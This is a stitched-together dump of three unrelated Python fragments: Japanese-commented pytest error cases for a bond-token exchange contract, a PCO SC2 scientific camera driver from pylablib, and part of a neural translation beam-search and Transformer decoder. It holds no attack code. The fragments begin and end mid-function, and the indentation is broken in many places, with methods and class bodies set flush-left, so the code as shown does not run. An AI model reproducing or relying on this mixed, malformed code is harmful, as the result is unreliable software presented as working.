        bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系8-1
# 名簿用個人情報が登録されていない場合(買注文)
def test_createorder_error_8_1(users,
                               bond_exchange, payment_gateway, personal_info):
    """Error case 8-1: buy order fails when no personal info is registered."""
    issuer = users['issuer']
    agent = users['agent']
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token (personal info deliberately NOT registered)
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Create a new order (buy)
    _amount = 100
    _price = 123
    _isBuy = True
    bond_exchange.createOrder.transact(bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系8-2
# 名簿用個人情報が登録されていない場合(売注文)
def test_createorder_error_8_2(users,
                               bond_exchange, payment_gateway, personal_info):
    """Error case 8-2: sell order fails when no personal info is registered; deposit returned."""
    issuer = users['issuer']
    agent = users['agent']
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token (personal info deliberately NOT registered)
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Deposit into the exchange
    _amount = 100
    bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
    # Create a new order (sell)
    _amount = 100
    _price = 123
    _isBuy = False
    bond_exchange.createOrder.transact(
        bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系9-1
# 償還済みフラグがTrueの場合
# <発行体>新規発行 -> <発行体>償還設定 -> <発行体>新規注文(買)
def test_createorder_error_9_1(users,
                               bond_exchange, personal_info, payment_gateway):
    """Error case 9-1: buy order fails on a token whose redeemed flag is True."""
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Mark the token as redeemed
    bond_token.redeem.transact({'from': issuer})
    # Create a new order (buy)
    _price = 123
    _isBuy = True
    _amount = 100
    bond_exchange.createOrder.transact(bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系9-2
# 償還済みフラグがTrueの場合
# <発行体>新規発行 -> <発行体>償還設定 -> <発行体>新規注文(売)
def test_createorder_error_9_2(users,
                               bond_exchange, personal_info, payment_gateway):
    """Error case 9-2: sell order fails on a redeemed token; deposit returned."""
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Deposit into the exchange
    _amount = 100
    bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
    # Mark the token as redeemed
    bond_token.redeem.transact({'from': issuer})
    # Create a new order (sell)
    _price = 123
    _isBuy = False
    bond_exchange.createOrder.transact(
        bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系10
# 残高不足
def test_createorder_error_10(users,
                              bond_exchange, personal_info, payment_gateway):
    """Error case 10: sell order exceeding the deposited balance fails; deposit returned."""
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Deposit into the exchange
    _amount = 100
    bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
    # Create a new order (sell) for more than was deposited
    _price = 123
    _isBuy = False
    bond_exchange.createOrder.transact(
        bond_token.address, _amount + 1, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系11-1
# 無効な収納代行業者(Agent)の指定(買)
def test_createorder_error_11_1(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
| |
<filename>pylablib/aux_libs/devices/PCO_SC2.py
from . import PCO_SC2_lib
from .PCO_SC2_lib import lib, PCOSC2LibError, named_tuple_to_dict
from ...core.devio.interface import IDevice
from ...core.utils import funcargparse, py3, dictionary, general
from ...core.dataproc import image as image_utils
_depends_local=[".PCO_SC2_lib","...core.devio.interface"]
import numpy as np
import collections
import contextlib
import ctypes
import time
import threading
class PCOSC2Error(RuntimeError):
    """Generic PCO SC2 camera error (base class for this module's errors)."""
class PCOSC2TimeoutError(PCOSC2Error):
    """Raised when waiting for a camera event or frame times out."""
class PCOSC2NotSupportedError(PCOSC2Error):
    """Raised when an option is not supported by the connected camera model."""
def get_cameras_number():
    """Get number of connected PCOSC2 cameras"""
    lib.initlib()
    handles=[]
    # Keep opening cameras until the SDK refuses; the number of successful
    # opens is the number of connected cameras.
    try:
        while True:
            handles.append(lib.PCO_OpenCamera(0))
    except PCOSC2LibError:
        pass
    # Release every handle we grabbed during the probe (best-effort).
    for handle in handles:
        try:
            lib.PCO_CloseCamera(handle)
        except PCOSC2LibError:
            pass
    return len(handles)
def reset_api():
    """
    Reset API.

    All cameras must be closed; otherwise, the prompt to reboot will appear.
    """
    lib.initlib()
    # Re-initializes the SDK's internal state via the library wrapper.
    lib.PCO_ResetLib()
class PCOSC2Camera(IDevice):
"""
PCO SC2 camera.
Args:
idx(int): camera index (use :func:`get_cameras_number` to get the total number of connected cameras)
reboot_on_fail(bool): if ``True`` and the camera raised an error during initialization (but after opening), reboot the camera and try to connect again
useful when the camera is in a broken state (e.g., wrong ROI or pixel clock settings)
"""
def __init__(self, idx=0, reboot_on_fail=True):
    IDevice.__init__(self)
    lib.initlib()
    self.idx=idx
    # SDK camera handle; None while the connection is closed.
    self.handle=None
    self.reboot_on_fail=reboot_on_fail
    # Cached camera state, populated by update_full_data() during open().
    self._full_camera_data=dictionary.Dictionary()
    self._capabilities=[]
    self._model_data=None
    # Frame-buffer bookkeeping used by the acquisition loop.
    self._buffers=None
    self._default_nframes=100
    self._buffer_looping=False
    self._buffer_loop_thread=None
    self._next_wait_buffer=0
    self._next_read_buffer=0
    self._next_schedule_buffer=0
    self._next_buffer=0
    self._last_wait_frame=0
    self.image_indexing="rct"
    # Shorthand accessor into the cached full-camera-data dictionary.
    self.v=dictionary.ItemAccessor(lambda n:self._full_camera_data[n])
    # Connect immediately; open() also populates the cached camera data.
    self.open()
    # Unsupported options are reported via PCOSC2NotSupportedError on "get".
    self._nodes_ignore_error={"get":(PCOSC2NotSupportedError,),"set":()}
    # Register device nodes (info/status/settings) for the IDevice interface.
    self._add_full_info_node("model_data",self.get_model_data)
    self._add_full_info_node("capabilities",self.get_capabilities)
    self._add_status_node("temperature_monitor",self.get_temperature)
    self._add_settings_node("trigger_mode",self.get_trigger_mode,self.set_trigger_mode)
    self._add_settings_node("exposure",self.get_exposure,self.set_exposure)
    self._add_settings_node("frame_delay",self.get_frame_delay,self.set_frame_delay)
    self._add_status_node("timings",self.get_timings)
    self._add_settings_node("frame_time",self.get_frame_time,self.set_frame_time)
    self._add_status_node("buffer_size",self.get_buffer_size)
    self._add_status_node("buffer_status",self.get_buffer_status)
    self._add_status_node("data_dimensions",self.get_data_dimensions)
    self._add_settings_node("bit_alignment",self.get_bit_aligment,self.set_bit_aligment)
    self._add_settings_node("hotpixel_correction",self.is_pixel_correction_enabled,self.enable_pixel_correction)
    self._add_settings_node("noise_filter",self.get_noise_filter_mode,self.set_noise_filter_mode)
    self._add_settings_node("status_line",self.get_status_line_mode,self.set_status_line_mode)
    self._add_settings_node("metadata_mode",self.get_metadata_mode,self.set_metadata_mode)
    self._add_settings_node("pixel_rate",self.get_pixel_rate,self.set_pixel_rate)
    self._add_full_info_node("all_pixel_rates",self.get_available_pixel_rates)
    self._add_full_info_node("conversion_factor",self.get_conversion_factor)
    self._add_full_info_node("detector_size",self.get_detector_size)
    self._add_settings_node("roi",self.get_roi,self.set_roi)
    self._add_status_node("roi_limits",self.get_roi_limits)
    self._add_status_node("acq_status",self.get_status)
    self._add_status_node("acq_in_progress",self.acquisition_in_progress)
    self._add_full_info_node("full_data",self.get_full_camera_data)
def open(self):
    """Open connection to the camera"""
    # Two attempts: if the first full-data update fails and reboot_on_fail is
    # set, reboot the camera (clears broken settings) and retry once.
    for t in range(2):
        self.handle=lib.PCO_OpenCamera(self.idx)
        try:
            self.update_full_data()
            return
        except:
            # Bare except is deliberate here: any failure triggers cleanup,
            # and the error is re-raised on the final attempt, not swallowed.
            if self.reboot_on_fail and t==0:
                self.reboot()
            else:
                self.close()
                raise
def close(self):
    """Close connection to the camera"""
    if self.handle is None:
        return
    # Best-effort stop of any running acquisition before releasing the handle.
    try:
        self.stop_acquisition()
    except PCOSC2LibError:
        pass
    lib.PCO_CloseCamera(self.handle)
    self.handle=None
def is_opened(self):
    """Check if the device is connected (a valid camera handle exists)."""
    return self.handle is not None
def reboot(self, wait=True):
    """
    Reboot the camera.

    If ``wait==True``, wait for the recommended time (10 seconds) after reboot for the camera to fully restart;
    attempt to open the camera before that can lead to an error.
    """
    if self.handle is None:
        # No handle, nothing to reboot.
        return
    # Note: re-assignment below keeps the original structure; the handle is
    # invalid after PCO_RebootCamera, so it is closed and discarded here.
    lib.PCO_RebootCamera(self.handle)
    lib.PCO_CloseCamera(self.handle)
    if wait:
        time.sleep(10.)
def get_full_camera_data(self):
    """Get a dictionary of all camera data available through the SDK."""
    cam_data=dictionary.Dictionary()
    # Human-readable identification strings, indexed by SDK info-string codes.
    for (i,name) in enumerate(["interface","camera","sensor","serial_number","fw_build","fw_rev"]):
        cam_data["info_strings",name]=py3.as_str(lib.PCO_GetInfoString(self.handle,i))
    # Expand each SDK structure into a nested dictionary branch.
    cam_data["general"]=named_tuple_to_dict(lib.PCO_GetGeneral(self.handle),expand_lists=True)
    cam_data["sensor"]=named_tuple_to_dict(lib.PCO_GetSensorStruct(self.handle),expand_lists=True)
    cam_data["img_timing"]=named_tuple_to_dict(lib.PCO_GetImageTiming(self.handle),expand_lists=True)
    cam_data["timing"]=named_tuple_to_dict(lib.PCO_GetTimingStruct(self.handle),expand_lists=True)
    cam_data["storage"]=named_tuple_to_dict(lib.PCO_GetStorageStruct(self.handle),expand_lists=True)
    cam_data["recording"]=named_tuple_to_dict(lib.PCO_GetRecordingStruct(self.handle),expand_lists=True)
    cam_data["image"]=named_tuple_to_dict(lib.PCO_GetImageStruct(self.handle),expand_lists=True)
    # Trim fixed-size SDK arrays down to the entries that are actually valid:
    # signal descriptions beyond the real signal count, and empty RAM segments.
    signal_num=len(cam_data["sensor/strSignalDesc"])
    for k in list(cam_data["timing/strSignal"].keys()):
        if int(k)>=signal_num:
            del cam_data["timing/strSignal",k]
    for k in list(cam_data["image/strSegment"].keys()):
        if cam_data["image/strSegment",k,"dwMaxImageCnt"]==0:
            del cam_data["image/strSegment",k]
    return cam_data
def update_full_data(self):
    """
    Update internal full camera data settings.

    Takes some time (about 50ms), so more specific functions are preferable for specific parameters.
    """
    # Arm first so the queried values reflect the currently applied settings.
    self._arm()
    self._full_camera_data=self.get_full_camera_data()
    self._capabilities=self.get_capabilities()
    self._model_data=self.get_model_data()
def _arm(self):
    """Arm the camera, i.e., validate and apply all pending settings."""
    lib.PCO_ArmCamera(self.handle)
# Summary of the camera identity returned by get_model_data().
ModelData=collections.namedtuple("ModelData",["model","interface","sensor","serial_number"])
# Map of SDK interface-type codes (general/strCamType/wInterfaceType) to names.
_interface_codes={1:"firewire",2:"camlink",3:"usb2",4:"gige",5:"serial",6:"usb3",7:"clhs"}
def get_model_data(self):
    """
    Get camera model data.

    Return tuple ``(model, interface, sensor, serial_number)``.
    """
    # Unknown interface codes are mapped to the string "unknown".
    intf=self._interface_codes.get(self.v["general/strCamType/wInterfaceType"],"unknown")
    return self.ModelData(self.v["info_strings/camera"],intf,self.v["info_strings/sensor"],self.v["info_strings/serial_number"])
def _parse_flag_bits(self, value, desc):
    """Decode a bit-flag word into the set of names listed in ``desc``.

    Entries in ``desc`` are flag names assigned to consecutive bits; an entry
    may instead be a ``(name, bit)`` tuple, which repositions the running mask.
    """
    names=set()
    mask=1
    for entry in desc:
        if isinstance(entry,tuple):
            entry,mask=entry
        if value&mask:
            names.add(entry)
        mask<<=1
    return names
# Capability names for the dwGeneralCapsDESC1 word, listed in bit order
# (decoded with _parse_flag_bits in get_capabilities).
_caps_desc1=[ "noise_filter","hotpix_filter","hotpix_with_noise_only","timestamp_ascii_only",
            "dataformat2x12","record_stop","hot_pixel_correction","no_extexpctl",
            "no_timestamp","no_acq_mode","dataformat4x16","dataformat5x16",
            "no_record","fast_timing","metadata","set_framerate",
            "cdi_mode","ccm","ext_sync","no_global_shutter",
            "global_reset_mode","ext_acq","fan_ctl","symm_vert_roi",
            "symm_hor_roi","cooling_setp"]
def get_capabilities(self):
    """
    Get camera capabilities.

    Return a set of capability names decoded from the sensor description word;
    for the meaning of individual capabilities, see the PCO SC2 manual.
    """
    caps=self.v["sensor/strDescription/dwGeneralCapsDESC1"]
    return self._parse_flag_bits(caps,self._caps_desc1)
def _has_option(self, option):
    """Check whether ``option`` is among the cached camera capabilities."""
    return option in self._capabilities
def _check_option(self, option, value=True):
    """Require that ``option`` support equals ``value``; raise :exc:`PCOSC2NotSupportedError` otherwise."""
    has_option=self._has_option(option)
    if has_option!=value:
        raise PCOSC2NotSupportedError("option {} is not supported by {}".format(option,self.get_model_data().model))
    return has_option
def _is_pco_edge(self):
    """Check whether the camera is a pco.edge model (camera type word 0x13xx)."""
    return (self.v["general/strCamType/wCamType"]&0xFF00)==0x1300
def _is_camlink(self):
    """Check whether the camera uses a CameraLink-style interface."""
    return self.v["general/strCamType/wInterfaceType"] in [2,7] # CL and CLHS
### Generic controls ###
def _apply_timebase(self, value, timebase):
    """Convert ``value`` given in SDK timebase units (0=ns, 1=us, 2=ms) into seconds."""
    scale=(1E-9,1E-6,1E-3)[timebase]
    return value*scale
def _extract_timebase(self, value):
    """Split a time ``value`` in seconds into ``(count, timebase)``, 0=ns, 1=us, 2=ms.

    Picks the finest timebase that keeps the integer count within range:
    nanoseconds below 1 s, microseconds below 1000 s, milliseconds otherwise.
    """
    if value<1.:
        return (int(value*1E9),0)
    if value<1E3:
        return (int(value*1E6),1)
    return (int(value*1E3),2)
# Bit names for the status/warning/error words returned by
# PCO_GetCameraHealthStatus, in bit order (decoded with _parse_flag_bits).
_status_bits=[ "default_state","settings_valid","recording_on","readout_on",
            "frame_rate_dominant","stop_triggered","ext_sync_locked","battery_on",
            "power_save_on","power_save_left","irig_locked"]
_warning_bits=["power_supply_voltage","power_supply_temp","camera_temp","sensor_temp","battery","offset_reg"]
# "interface" is explicitly pinned to bit 0x10000 via the (name, bit) form.
_error_bits=["power_supply_voltage","power_supply_temp","camera_temp","sensor_temp","battery",("interface",0x10000),"ram_module","main_board","head_board"]
# Result type of get_status(full=True).
CameraStatus=collections.namedtuple("CameraStatus",["status","warnings","errors"])
def get_status(self, full=False):
    """
    Get camera status.

    If ``full==True``, return tuple ``(status, warnings, errors)`` with additional
    information about warnings and errors; otherwise, return only the current
    camera status as a set of enabled status states.
    (The original docstring had the two cases swapped; the code below is authoritative.)
    """
    warn,err,stat=lib.PCO_GetCameraHealthStatus(self.handle)
    if full:
        return self.CameraStatus(self._parse_flag_bits(stat,self._status_bits),self._parse_flag_bits(warn,self._warning_bits),self._parse_flag_bits(err,self._error_bits))
    else:
        return self._parse_flag_bits(stat,self._status_bits)
    def get_temperature(self):
        """
        Get the current camera temperature
        
        Return tuple ``(CCD, cam, power)`` with temperatures of the sensor, camera, and power supply respectively.
        """
        temp=lib.PCO_GetTemperature(self.handle)
        # the sensor (CCD) temperature is reported in units of 0.1 C, hence the division;
        # cam and pow are passed through as-is (presumably already in C -- confirm against the SC2 manual)
        return (temp.ccd/10.,temp.cam,temp.pow)
def get_conversion_factor(self):
"""Get camera conversion factor (electrons per pixel value)"""
return lib.PCO_GetConversionFactor(self.handle)/100.
### Trigger controls ###
_trigger_modes={"int":0,"soft":1,"ext":2,"ext_exp":3,"ext_sync":4,"ext_exp_fast":5,"ext_cds":6,"ext_exp_slow":7,"ext_sync_hdsdi":0x102}
_trigger_modes_inv=general.invert_dict(_trigger_modes)
def get_trigger_mode(self):
"""Get current trigger mode (see :meth:`set_trigger_mode` for description)"""
mode=lib.PCO_GetTriggerMode(self.handle)
return self._trigger_modes_inv[mode]
    def set_trigger_mode(self, mode):
        """
        Set trigger mode.

        Can be ``"int"`` (internal), ``"soft"`` (software), ``"ext"`` (external+software), ``"ext_exp"`` (external exposure), ``"ext_sync"`` (external PLL sync),
        ``"ext_exp_fast"`` (fast external exposure), ``"ext_cds"`` (external CDS control),
        ``"ext_exp_slow"`` (slow external exposure), or ``"ext_sync_hdsdi"`` (external synchronized HD-SDI).

        For description, see PCO SDK manual.
        """
        funcargparse.check_parameter_range(mode,"mode",self._trigger_modes.keys())
        lib.PCO_SetTriggerMode(self.handle,self._trigger_modes[mode])
        self._arm()
        return self.get_trigger_mode()
def send_software_trigger(self):
"""Send software trigger signal"""
return bool(lib.PCO_ForceTrigger(self.handle))
### Acquisition controls ###
class Buffer(object):
"""Single frame buffer object, which controls setup, cleanup, and synchronization"""
def __init__(self, size, metadata_size=0):
object.__init__(self)
self.buff=ctypes.create_string_buffer(size)
self.event=lib.CreateEvent()
self.size=size
self.status=PCO_SC2_lib.DWORD()
self.metadata_size=metadata_size
self.lock=threading.Lock()
def wait(self, timeout):
if not self.lock.acquire(timeout=(-1 if timeout is None else timeout)):
return False
wait_res=lib.WaitForSingleObject(self.event,(-1 if timeout is None else np.int(timeout*1000)))==0
self.lock.release()
return wait_res
def reset(self):
with self.lock:
lib.ResetEvent(self.event)
def release(self):
if self.buff is not None:
lib.CloseHandle(self.event)
self.buff=None
self.event=None
    def _allocate_buffers(self, n):
        """Stop any running acquisition and allocate `n` frame buffers of the driver-reported size; reset the frame counters"""
        self.stop_acquisition()
        frame_size,metadata_size=self._get_buffer_size()
        self._buffers=[self.Buffer(frame_size+metadata_size,metadata_size=metadata_size) for _ in range(n)]
        # counters index the unbounded logical frame sequence; the buffer for frame i is self._buffers[i%n]
        self._next_wait_buffer=0  # next frame to wait on
        self._next_read_buffer=0  # next frame to read out
        self._next_schedule_buffer=0  # next frame to schedule with the SDK
        self._last_wait_frame=0  # last frame observed by wait_for_frame
        return n
    def _schedule_buffer(self, buff):
        """Add a single buffer to the camera driver queue; its event fires and its status word updates when the frame arrives"""
        lib.PCO_AddBufferExtern(self.handle,buff.event,0,0,0,0,buff.buff,buff.size,ctypes.byref(buff.status))
    def _schedule_all_buffers(self, n=None):
        """Schedule the first `n` allocated buffers with the driver (by default all of them, capped at the SDK queue limit of 32)"""
        if self._buffers:
            if n is None:
                n=min(len(self._buffers),32)
            for b in self._buffers[:n]:
                self._schedule_buffer(b)
                self._next_schedule_buffer+=1
def _unschedule_all_buffers(self):
if self._buffers:
lib.PCO_CancelImages(self.handle)
def _deallocate_buffers(self):
if self._buffers is not None:
for b in self._buffers:
b.release()
self._buffers=None
    def _loop_schedule_refresh_buffers(self):
        """Buffer upkeep loop (runs in a background thread): advance the wait counter as buffers fill, and keep the driver queue topped up"""
        nbuff=len(self._buffers)
        nsched=min(nbuff,32)  # the SDK driver queue holds at most 32 buffers at a time
        while self._buffer_looping:
            actioned=False
            if self._next_wait_buffer<self._next_schedule_buffer: # scheduled buffers available
                buff=self._buffers[self._next_wait_buffer%nbuff]
                # short poll keeps the loop responsive to _buffer_looping being cleared
                succ=buff.wait(timeout=0.001)
                if succ:
                    self._next_wait_buffer+=1
                    actioned=True
            if self._next_schedule_buffer<self._next_wait_buffer+nsched and self._next_schedule_buffer<self._next_read_buffer+nbuff: # more scheduling space and buffer space
                # re-schedule the oldest free buffer; its event must be reset first
                buff=self._buffers[self._next_schedule_buffer%nbuff]
                buff.reset()
                self._schedule_buffer(buff)
                self._next_schedule_buffer+=1
                actioned=True
            if not actioned:
                time.sleep(0.001)  # nothing to do this pass; avoid a busy loop
def _stop_reading_loop(self):
if self._buffer_loop_thread is not None:
self._buffer_looping=False
self._buffer_loop_thread.join()
self._buffer_loop_thread=None
def _start_reading_loop(self):
self._stop_reading_loop()
self._buffer_loop_thread=threading.Thread(target=self._loop_schedule_refresh_buffers,daemon=True)
self._buffer_looping=True
self._buffer_loop_thread.start()
    def _read_next_buffer(self, npx=None):
        """Read out the next filled buffer.

        `npx` is the number of 16-bit pixels to read (by default, the whole buffer).
        Return ``(frame, metadata)`` (``metadata`` is ``None`` when the buffer carries none),
        or ``None`` if no filled buffer is currently available.
        """
        if self._buffers is None or self._next_read_buffer>=self._next_wait_buffer:
            return None
        buff=self._buffers[self._next_read_buffer%len(self._buffers)]
        if npx is None:
            npx=len(buff.buff)//2  # 2 bytes per pixel
        # copy, since the underlying buffer is about to be rescheduled and overwritten
        frame=np.frombuffer(buff.buff,dtype="<u2",count=npx).copy()
        metadata=buff.buff[-buff.metadata_size:] if buff.metadata_size>0 else None
        self._next_read_buffer+=1
        return frame,metadata
def _wait_for_next_buffer(self, timeout=None):
if self._buffers is None:
return False
if self._next_wait_buffer>self._next_read_buffer:
return True
buff=self._buffers[self._next_read_buffer%len(self._buffers)]
return buff.wait(timeout)
AcqTimes=collections.namedtuple("AcqTimes",["exposure","frame_delay","frame_time"])
def get_timings(self):
"""
Get acquisition timing.
Return tuple ``(exposure, frame_delay, frame_time)``.
"""
timings=lib.PCO_GetImageTiming(self.handle)
exp=timings.ExposureTime_s+timings.ExposureTime_ns*1E-9
frame_delay=timings.TriggerDelay_s+timings.TriggerDelay_ns*1E-9
frame_time=timings.FrameTime_s+timings.FrameTime_ns*1E-9
return self.AcqTimes(exp,frame_delay,frame_time)
    def _set_exposure_delay(self, exposure, frame_delay):
        """Set exposure and frame delay (both in seconds), clamped to the camera-reported limits, then re-arm the camera"""
        # the description reports minima in ns and maxima in ms, hence the unit factors
        exposure=max(exposure,self.v["sensor/strDescription/dwMinExposureDESC"]*1E-9)
        exposure=min(exposure,self.v["sensor/strDescription/dwMaxExposureDESC"]*1E-3)
        frame_delay=max(frame_delay,self.v["sensor/strDescription/dwMinDelayDESC"]*1E-9)
        frame_delay=min(frame_delay,self.v["sensor/strDescription/dwMaxDelayDESC"]*1E-3)
        # the SDK takes (value, timebase) integer pairs rather than floats
        ev,eb=self._extract_timebase(exposure)
        dv,db=self._extract_timebase(frame_delay)
        lib.PCO_SetDelayExposureTime(self.handle,dv,ev,db,eb)
        self._arm()
def set_exposure(self, exposure):
"""Set camera exposure"""
self._set_exposure_delay(exposure,self.get_frame_delay())
return self.get_exposure()
def get_exposure(self):
"""Get current exposure"""
return self.get_timings().exposure
def set_frame_delay(self, frame_delay):
"""Set camera frame delay"""
self._set_exposure_delay(self.get_exposure(),frame_delay)
return self.get_frame_delay()
def get_frame_delay(self):
"""Get current frame delay"""
return self.get_timings().frame_delay
    def set_frame_time(self, frame_time=0, adjust_exposure=False):
        """
        Set frame time (frame acquisition period).

        If the time can't be achieved even with zero frame delay and ``adjust_exposure==True``, try to reduce the exposure to get the desired frame time;
        otherwise, keep the exposure the same.
        """
        exposure,frame_delay,curr_frame_time=self.get_timings()
        if curr_frame_time-frame_delay<=frame_time:
            # the target is reachable by adjusting the delay alone
            frame_delay=frame_delay+frame_time-curr_frame_time
        else:
            frame_delay=0
            if adjust_exposure:
                # shrink the exposure by the remaining shortfall (clamped at zero)
                exposure=max(0,frame_delay+frame_time-curr_frame_time+exposure)
        self._set_exposure_delay(exposure,frame_delay)
        return self.get_frame_time()
def get_frame_time(self):
"""Get current frame time (frame acquisition period)"""
return self.get_timings().frame_time
def get_pixel_rate(self):
"""Get camera pixel rate (in Hz)"""
return lib.PCO_GetPixelRate(self.handle)
def get_available_pixel_rates(self):
"""Get all available pixel rates"""
rates=self.v["sensor/strDescription/dwPixelRateDESC"]
rlist=[rates[k] for k in rates if rates[k]>0]
return sorted(rlist)
def set_pixel_rate(self, rate=None):
"""
Set camera pixel rate (in Hz)
The rate is always rounded to the closest available.
If `rate` is ``None``, set the maximal possible rate.
"""
rates=self.get_available_pixel_rates()
if rate is None:
rate=rates[-1]
else:
rate=sorted(rates,key=lambda r: abs(r-rate))[0]
lib.PCO_SetPixelRate(self.handle,rate)
if self.v["general/strCamType/wCamType"]==0x1300: # pco.edge 5.5 CL
lib.PCO_SetTransferParametersAuto(self.handle)
self._arm()
return self.get_pixel_rate()
### Acquisition process controls ###
    def start_acquisition(self, buffn=None):
        """
        Start camera acquisition.

        `buffn` specifies number of frames in the ring buffer (automatically capped at 32, which is the SDK limit)
        """
        self.stop_acquisition()
        self._allocate_buffers(n=buffn or self._default_nframes)
        self._arm()
        # pco.edge over CameraLink gets buffers scheduled before recording starts,
        # other setups the other way around (presumably an SDK requirement -- see PCO SDK manual)
        if self._is_pco_edge() and self._is_camlink():
            self._schedule_all_buffers()
            self._start_reading_loop()
            lib.PCO_SetRecordingState(self.handle,1)
        else:
            lib.PCO_SetRecordingState(self.handle,1)
            self._schedule_all_buffers()
            self._start_reading_loop()
    def stop_acquisition(self):
        """
        Stop acquisition.

        Clears buffers as well, so any readout after acquisition stop is impossible.
        """
        # teardown in reverse order of setup: loop, driver queue, recording, buffers
        self._stop_reading_loop()
        self._unschedule_all_buffers()
        lib.PCO_SetRecordingState(self.handle,0)
        self._deallocate_buffers()
def acquisition_in_progress(self):
"""Check if the acquisition is in progress"""
return bool(lib.PCO_GetRecordingState(self.handle))
def wait_for_frame(self, since="lastread", timeout=20., period=1E-3):
"""
Wait for a new camera frame.
`since` specifies what constitutes a new frame.
Can be ``"lastread"`` (wait for a new frame after the last read frame), ``"lastwait"`` (wait for a new frame after last :meth:`wait_for_frame` call),
or ``"now"`` (wait for a new frame acquired after this function call).
If `timeout` is exceeded, raise :exc:`.PCOSC2TimeoutError`.
`period` specifies camera polling period.
"""
if not self.acquisition_in_progress():
return
last_acq_frame=self._next_wait_buffer-1
last_read_frame=self._next_read_buffer-1
if since=="lastread" and last_acq_frame>last_read_frame:
self._last_wait_frame=last_acq_frame
return
if since=="lastwait" and last_acq_frame>self._last_wait_frame:
self._last_wait_frame=last_acq_frame
return
ctd=general.Countdown(timeout)
while not ctd.passed():
new_valid=self._next_wait_buffer>self._next_read_buffer
if new_valid:
break
time.sleep(0.001)
if not | |
states: A `.NestedMap` of tensors representing states that the clients
would like to keep track of for each of the active hyps.
num_hyps_per_beam: Beam size.
Returns:
A tuple (results, out_states).
results: A `.NestedMap` of beam search results.
atten_probs:
The updated attention probs, of shape [tgt_batch, src_len].
log_probs:
Log prob for each of the tokens in the target vocab. This is of shape
[tgt_batch, vocab_size].
out_states: A `.NestedMap`. The updated states.
rnn_states:
Last state of the RNN.
atten_context:
Updated attention context vector.
atten_states:
Updates attention states.
"""
p = self.params
prev_rnn_states = states['rnn_states']
prev_atten_context = states['atten_context']
prev_atten_probs = states['atten_probs']
prev_atten_states = states['atten_states']
step_paddings = tf.zeros(py_utils.GetShape(step_ids), dtype=p.dtype)
embs = self.emb.EmbLookup(theta.emb, tf.reshape(step_ids, [-1]))
embs = self.ApplyClipping(theta, embs)
atten_context, atten_probs, rnn_states, step_out, atten_states = (
self._DecodeStep(theta, encoder_outputs, embs, step_paddings,
prev_atten_context, prev_rnn_states,
prev_atten_states))
atten_probs = tf.reshape(atten_probs, tf.shape(prev_atten_probs))
logits = self.softmax.Logits(theta.softmax, [step_out])
log_probs = self.fns.qlogsoftmax(
logits, qmin=p.qlogsoftmax_range_min, qmax=0.0)
if p.use_prev_atten_ctx:
cur_atten_probs = prev_atten_probs
else:
cur_atten_probs = atten_probs
bs_results = py_utils.NestedMap({
'atten_probs': cur_atten_probs, # the probs exposed to beam search
'log_probs': log_probs,
})
new_states = py_utils.NestedMap({
'time_step': states.time_step + 1,
'rnn_states': rnn_states,
'atten_context': atten_context,
'atten_probs': atten_probs, # the updated attention probs
'atten_states': atten_states,
})
return bs_results, new_states
  def _PostBeamSearchStepCallback(self, theta, encoder_outputs, new_step_ids,
                                  states):
    """No-op post-step hook required by the beam search API; returns `states` unchanged."""
    # There is nothing to do here.
    return states
class TransformerDecoder(MTBaseDecoder):
"""Transformer decoder.
Implements the decoder of Transformer model:
https://arxiv.org/abs/1706.03762.
"""
  @classmethod
  def Params(cls):
    """Returns decoder hyperparams with Transformer-specific defaults."""
    p = super(TransformerDecoder, cls).Params()
    p.Define('token_emb', layers.EmbeddingLayer.Params(),
             'Token embedding layer params.')
    p.Define('position_emb', layers.PositionalEmbeddingLayer.Params(),
             'Position embedding layer params.')
